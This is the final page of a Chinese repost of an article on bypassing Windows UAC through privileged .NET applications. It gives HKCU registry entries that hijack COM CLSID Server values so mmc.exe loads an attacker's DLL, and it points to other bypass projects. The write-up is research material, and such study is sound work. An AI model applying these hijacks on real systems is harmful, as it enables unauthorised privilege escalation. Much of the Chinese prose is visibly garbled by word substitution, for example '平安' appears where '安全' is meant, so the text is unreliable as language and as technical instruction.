欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

怎样利用特权.NET应用程序绕开UAC检测

来源:本站整理 作者:佚名 时间:2017-09-21 TAG: 我要投稿
[HKEYCURRENTUSER\Software\Classes\CLSID{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32\4.0.30319] @="4.0.30319" "ImplementedInThisVersion"=""
[HKEYCURRENTUSER\Software\Classes\CLSID{0A29FF9E-7F9C-4437-8B11-F424491E3931}\ProgID] @="CorSymBinder_SxS"
[HKEYCURRENTUSER\Software\Classes\CLSID{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server] @="C:\Temp\test_unmanaged.dll"
将“Microsoft Common Language Runtime Meta Data”组件作为原生DLL,经由进程\Server进口停止挟制(仅适用于secpol.msc)。

Windows Registry Editor Version 5.00
[HKEYCURRENTUSER\Software\Classes\CLSID{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}] @="Microsoft Common Language Runtime Meta Data"
[HKEYCURRENTUSER\Software\Classes\CLSID{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\InprocServer32] @="C:\Windows\System32\mscoree.dll" "ThreadingModel"="Both"
[HKEYCURRENTUSER\Software\Classes\CLSID{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\InprocServer32\4.0.30319] @="4.0.30319" "ImplementedInThisVersion"=""
[HKEYCURRENTUSER\Software\Classes\CLSID{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\ProgID] @="CLRMetaData.CorRuntimeHost.2"
[HKEYCURRENTUSER\Software\Classes\CLSID{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\Server] @="..\..\..\..\Temp\test_unmanaged.dll"
留意:这里所应用的门路必需是绝对门路,不然mmc.exe会测验考试加载C:\Windows\Microsoft.NET\Framework64\v4.0.30319\C:\Temp\test_unmanaged.dll。
六、不平安的平安屏蔽
微软曾重复亮相,称UAC并非一个平安屏蔽。平安职员通常会应用加倍贴切现实的说话来描写这一点:不要相信UAC,不要以split-token治理员身份运转,非治理员义务一直应用非治理员用户权限运转。我非常附和这段话。
尽管如此,很多人仍旧会以当地治理员身份来运转,这些人恰是渗入渗出测试职员(或许红队)和攻击者的目标。是以我觉得会有人对这项技巧感兴趣。
就渗入渗出测试而言,我保举@tiraniddo应用的通用办法(详细实现样例可参考此链接,另一种实现办法很快就会颁布),此办法不用要加载DLL,今朝大多数EDR(端点检测与相应)解决方案都无奈捕捉这类办法。
别的,假如你对绕过UAC异常感兴趣,对付这主题网上有很多参考材料,但如下几份材料为必修课:
@enigma0x3的研讨成果(和他行将在DerbyCon上做的演讲内容)。
@tiraniddo写的应用SilentCleanup筹划义务和进程令牌绕过UAC的技巧:第1、2、3部分。
@hFireF0X创立的UACME名目,席卷了绝大部分已知的UAC绕过办法,他在内核情势方面也做了相干研讨。
@FuzzySec的UAC事情组和Bypass-UAC名目,应用PowerShell实现了多种绕过技巧。
异常感激Casey Smith(@subtee)对付 .NET profiler DLL的提醒,感激微软开发者在成绩本源方面给的提醒,感激Matt Graeber(@mattifestation)核阅本文并提出倡议。

上一页  [1] [2] [3] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载